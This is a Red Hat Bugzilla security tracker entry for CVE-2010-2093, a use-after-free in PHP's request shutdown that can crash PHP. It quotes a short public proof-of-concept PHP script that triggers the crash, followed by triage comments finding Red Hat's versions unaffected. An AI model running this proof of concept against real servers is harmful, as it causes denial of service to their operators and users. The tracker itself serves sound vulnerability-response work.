Bug 598474 (CVE-2010-2093, MOPS-2010-022)

Summary: CVE-2010-2093 PHP: Context stream use-after-free on request shutdown (MOPS-2010-022)
Product: [Other] Security Response
Component: vulnerability
Status: CLOSED NOTABUG
Severity: low
Priority: low
Version: unspecified
Hardware: All
OS: Linux
Keywords: Security
Reporter: Jan Lieskovsky <jlieskov>
Assignee: Red Hat Product Security <security-response-team>
CC: bressers, jorton, mjc, vdanen
URL: http://php-security.org/2010/05/12/mops-2010-022-php-stream-context-use-after-free-on-request-shutdown-vulnerability/index.html
Doc Type: Bug Fix
Last Closed: 2011-09-21 05:38:20 UTC

Description Jan Lieskovsky 2010-06-01 13:12:53 UTC
Common Vulnerabilities and Exposures assigned an identifier CVE-2010-2093 to
the following vulnerability:

Use-after-free vulnerability in the request shutdown functionality in
PHP 5.2 before 5.2.13 and 5.3 before 5.3.2 allows context-dependent
attackers to cause a denial of service (crash) via a stream context
structure that is freed before destruction occurs.

References:
  [1] http://php-security.org/2010/05/12/mops-2010-022-php-stream-context-use-after-free-on-request-shutdown-vulnerability/index.html

Public PoC (from [1]):

<?php
    // Open a stream and build up some heap state before touching its context
    $blah = fopen('/dev/zero', 'a');
    $arr = array();
    for ($i = 0; $i < 5000; $i++) {
        $arr[$i] = "";
    }
    // Query the stream's context; the context is later freed before the
    // stream is destroyed at request shutdown (see the description above)
    stream_context_get_options($blah);
    $a88 = fread($blah, 100000000000);
?>

Credit: Mateusz Kocielski

Comment 3 Tomas Hoger 2010-07-28 10:00:14 UTC
This issue is still unfixed in 5.3.3.

Comment 4 Huzaifa S. Sidhpurwala 2011-09-21 05:34:59 UTC
Statement:

Not Vulnerable. This issue does not affect the version of php as shipped with Red Hat Enterprise Linux 4, 5 and 6. This issue does not affect the version of php53 as shipped with Red Hat Enterprise Linux 5.

Comment 5 Huzaifa S. Sidhpurwala 2011-09-21 05:38:20 UTC
Fedora is currently updated to php-5.3 which is not affected by this flaw.